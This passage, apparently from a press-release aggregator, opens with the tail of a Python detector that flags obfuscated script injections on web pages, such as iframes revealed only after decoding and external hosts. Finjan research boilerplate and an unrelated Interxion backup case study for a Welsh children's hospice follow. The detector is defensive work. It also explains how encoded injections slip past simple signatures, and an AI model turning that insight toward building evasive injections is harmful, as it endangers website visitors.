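    revealed = bool(tags) and not IFRAME_RE.search(js)   # IFrame only visible after decoding
    primitives = sorted(set(PRIMITIVE_RE.findall(js)))
    ratio = sum(len(m) for m in ENCODED_RE.findall(js)) / max(len(js), 1)
    if revealed and (hidden or external):
        verdict = "block"
    elif primitives and ratio > 0.5:      # heavily encoded but not resolved: human review
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "primitives": primitives, "encoded_ratio": round(ratio, 2),
            "revealed_by_decoding": revealed, "hidden": hidden, "external_hosts": external}


def analyse_page(html, page_host):
    parser = ScriptExtractor()
    parser.feed(html)
    return [analyse_script(js, page_host) for js in parser.scripts]


if __name__ == "__main__":
    for i, finding in enumerate(analyse_page(SAMPLE_PAGE, "www.example.com")):
        print(i, finding)
```

A signature for the literal string `<iframe` would miss both injected scripts in the sample, because the tag only appears after the decoding step.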

For more on the CBS site infection: http://www.finjan.com/MCRCblog.aspx?EntryId=2103
For more on Finjan: http://www.finjan.com

Malicious Code Research Center (MCRC) is the leading research department at Finjan, dedicated to the research and detection of security vulnerabilities in Internet applications, as well as other popular programs. MCRC’s goal is to stay steps ahead of hackers attempting to exploit open platforms and technologies to develop malicious code such as Spyware, Trojans, Phishing attacks, worms and viruses. MCRC shares its research efforts with many of the world’s leading software vendors to help patch their security holes. MCRC is a driving force behind the development of next generation security technologies used in Finjan’s proactive web security solutions. For more information, visit our MCRC subsite.

Finjan is a global provider of web security solutions for the enterprise market. Our real-time, appliance-based web security solutions deliver the most effective shield against web-borne threats, freeing enterprises to harness the web for maximum commercial results. Finjan’s active real-time web security solutions utilize patented behaviour-based technology to repel all types of threats arriving via the web, such as spyware, phishing, Trojans and obfuscated malicious code, securing businesses against unknown and emerging threats, as well as known malware. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including Gartner, IDC, Butler Group, SC Magazine, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan’s award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential. For more information about Finjan, please visit: www.finjan.com.

Source: Eskenzi PR

Home of the Internet

At the heart of the community
Tŷ Hafan is a children’s hospice that provides care to children with life limiting illnesses. It offers a unique service to families in South Wales and relies on charitable donations to run the service. Tŷ Hafan also organises the biggest hospice lottery in the UK and a large proportion of its operating funds are raised through this lottery.

The lottery data is stored together with confidential children’s records and Tŷ Hafan’s donor database which provides access to valuable information on everyone who has supported Tŷ Hafan, including past and current supporters, how much each person has donated, what they have volunteered for and what their interests are. This database is stored at the Head Office in Cardiff where the Administration team is based. Because nearly all the charity’s funds are raised in-house, it would be impossible for the organisation to function without this crucial information.

Driving IT strategy forward
The hospice could not continue to provide services if it lost details of its donors and lottery subscribers. So Tŷ Hafan needed to remove the possibility of human and mechanical error and improve the robustness of its back-up and restore system. The hospice also needed to be able to safeguard offsite the highly confidential medical records of the children under its care. The back-up and restore process used to take place manually, with a member of the administrative staff inserting tapes each day. As well as requiring someone to be physically present, the manual tape-based back-up system was very slow to restore. A technical issue which arose during routine security updates to the server, and which resulted in the tape system failing, also highlighted the vulnerability of running the back-up and restore system in-house.

Key requirements: drive forward Tŷ Hafan’s IT strategy and enable the organisation to conduct day-to-day business without worrying about the risk of losing data; guarantee safety and security of children’s records and donor and lottery databases; reduce administration costs and increase amount of money being directly channelled into children’s services; reduce risk of human and technical error by switching to remote Internet based back-up and restore service; remove need to be physically present for backups to take place; improve efficiency of internal IT support for over 100 IT users at twin locations - Headquarters and Hospice.

Safeguarding the future
Previously the system was programmed at certain times of day to back up anything that had changed from the previous day. If no tape was put in, no back up took place. With the Interxion SDS system, the hospice can now rely on a completely automated backup system. At one stage, whilst Tŷ Hafan was running the tape backup system concurrently with SDS, the tape drive ceased to function due to an issue with the software. Fortunately, Interxion’s SDS system was already in place and back-up continued to be carried out automatically, whilst the tape backup system problems were being resolved.

Tŷ Hafan wanted the most advanced technology available to protect valuable records and data and improve efficiency, which helps drive the business forward. It enables its IT Manager, Alex Bruce, to manage the backup remotely across two geographically separate sites and to restore data very quickly at LAN Speed, by using the Local Storage Option, which backs up simultaneously onsite, as well as offsite to Interxion’s two remote Enterprise Class data centres.

Initially, the Secure Data Service (SDS) from Interxion was run using a spare PC, followed shortly by the purchase of stand alone equipment (NAS box) which removes the need for anyone to be there to insert a tape. Alex Bruce, IT Manager, Tŷ Hafan, says: “It’s a nice way to back up data as you don't need to push any buttons and it does the backups automatically. I can completely forget about the system until I need to use it, for example, if someone calls for help to restore a Word file they’ve accidentally deleted.”

Optimising business performance
The time between an issue being reported, with something needing to be restored, and the restore actually being done has now been vastly reduced. Instead of taking a key, opening a room and putting in a tape, this can now take place instantly.

“Overall, putting SDS in place means that I can go about the day to day business without having to worry about risk of losing data. The service is always running and backing up, and I receive an email every morning to say it has been successful.”

The new Interxion SDS system operates using a standard business broadband connection. The remote system has proved very valuable. It is refreshed and updated instantly. If corruption does occur on one of the databases it’s important for the organisation to be confident that it can get the system back to its last known good state. Interxion gives Tŷ Hafan the confidence that this will happen, should this ever occur.

In order to ensure that all eventualities are covered, a disaster recovery plan procedure has now been put in place which includes all aspects of emergency recovery that would be needed, including Secure Data Service encryption keys, passwords and telephone numbers.

Alex says: “Interxion have been easy to liaise with and deal with all enquiries in a timely manner, with instant responses to emails to their help desk. This was particularly important. As the only person responsible for the IT for the organisation, if there is an issue, I need an instant response. It would be unworkable to log an enquiry and have to wait three hours for an answer as the nature of the job means I will have moved on to deal with other things during that time, leaving the user’s problem unresolved, potentially losing valuable working time.

“I’ve been impressed with the level of service. Interxion staff offer continuous support and were brilliant with regard to solving the technical issues involved in setting up the new SDS system.

“One aspect which was of great assistance was being assigned a personal account manager by Interxion who ensured that everything ran smoothly.

“I would recommend Interxion to other clients without hesitation and to anyone considering other ways of looking at a back-up and restore service,” concludes Alex.

Interxion is a leading European provider of carrier neutral data centres. Headquartered in Schiphol-Rijk, The Netherlands, Interxion serves its customers from 23 carrier-neutral data centres located in 13 cities across 11 European countries. Interxion serves network and carrier-based, hosting and enterprise customers who require professionally managed and strictly controlled physical environments within which to operate mission-critical applications and computer systems. Interxion’s data centres offer cost-effective and fast access to multiple local and global communication networks. For more information please visit www.interxion.com

Source: Spreckley Partners